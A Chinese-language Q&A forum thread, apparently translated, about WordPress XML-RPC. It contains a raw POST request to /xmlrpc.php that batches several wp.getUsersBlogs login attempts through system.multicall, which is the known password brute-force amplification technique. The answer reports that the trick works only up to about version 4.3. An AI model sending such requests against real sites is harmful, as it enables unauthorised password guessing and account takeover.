对于任何使用xmlrpc的WordPress站点,如果我在第一个示例中添加正确的用户名和密码,那么我会得到正确的输出,但如果我在第二个示例中添加正确的凭据(或此后),那么我总是得到“不正确的用户名或密码”.
POST /xmlrpc.php HTTP/1.1
Host: example.com
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>User1</string></value>
<value><string>password1</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>User2</string></value>
<value><string>Password2</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>
1条答案
按热度按时间aemubtdh1#
我也在研究同样的漏洞,并偶然发现了同样的行为。我在一个XML-RPC暴力项目上发现了this GitHub issue,讨论了同样的问题。似乎这个漏洞在WordPress版本4.7.x之后就已经被修补了。我还在搜索这个漏洞是什么时候被修补的...
更新
真的很想找出漏洞的版本,所以现在安装了无数的WordPress版本后,我能够发现漏洞的工作版本4.3.29.从版本4.4它不再为我工作.
我希望这能让某人的头脑平静下来,就像它让我的头脑平静下来一样。